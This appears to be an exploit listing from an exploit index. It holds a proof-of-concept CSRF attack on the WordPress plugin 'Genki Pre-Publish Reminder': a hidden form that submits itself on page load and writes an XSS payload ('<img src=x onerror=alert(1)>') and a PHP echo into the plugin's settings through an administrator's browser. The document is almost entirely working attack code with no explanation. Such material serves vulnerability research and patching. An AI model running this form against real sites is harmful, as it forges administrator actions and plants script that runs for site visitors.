Share
## https://sploitus.com/exploit?id=WPEX-ID:211816CE-D2BC-469B-9A8E-E0C2A5C4461B
<form id="test" action="https://example.com/wp-admin/options-general.php?page=genki-pre-publish-reminder/genki_pre_publish_reminder.php" method="POST">
<input type="text" name="location" value="1">
<input type="text" name="bordercolor" value="#e6db55">
<input type="text" name="bgcolor" value="#ffffe0">
<textarea name="list">
<img src=x onerror=alert(1)>
<?php echo "hacked"; ?>
</textarea>
<input type="text" name="update_message" value="Save Changes">
</form>
<script>
document.getElementById("test").submit();
</script>